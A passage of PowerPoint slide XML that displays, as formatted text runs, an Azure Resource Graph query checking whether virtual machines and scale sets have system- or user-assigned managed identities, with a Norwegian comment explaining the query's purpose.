                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>// UAMI = User-assigned Managed Identity</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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B7C8B"/>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srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Sjekker</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> om VM </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>eller</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> VMSS </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>har</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> SAMI </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>eller</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> UAMI</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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resources</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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6B7C8B"/>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 join kind=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="4284AE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>leftouter</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>resourcecontainers</a:t>
            </a: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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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6B7C8B"/>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 where type==</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>microsoft.resources</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/subscriptions'</a:t>
            </a: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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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6B7C8B"/>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 project </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>subscriptionName</a:t>
            </a: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=name, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>subscriptionId</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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6B7C8B"/>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 on </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>subscriptionId</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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6B7C8B"/>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 where type =~ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>microsoft.compute</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>virtualmachines</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>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 or</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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type =~ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>microsoft.compute</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>virtualMachineScaleSets</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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6B7C8B"/>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 extend </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>identityType</a:t>
            </a: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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>identity.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="4284AE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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6B7C8B"/>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 extend </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>hasManagedIdentity</a:t>
            </a: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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="4284AE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>iff</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>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identity == </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>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srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"No"</a:t>
            </a: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srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"Yes"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>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a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>isSystemAssignedEnable</a:t>
            </a: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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="4284AE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>iff</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>identityType</a:t>
            </a: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 contains </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SystemAssigned</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>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srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"Yes"</a:t>
            </a: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srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"No"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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6B7C8B"/>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 project </a:t>
            </a:r>
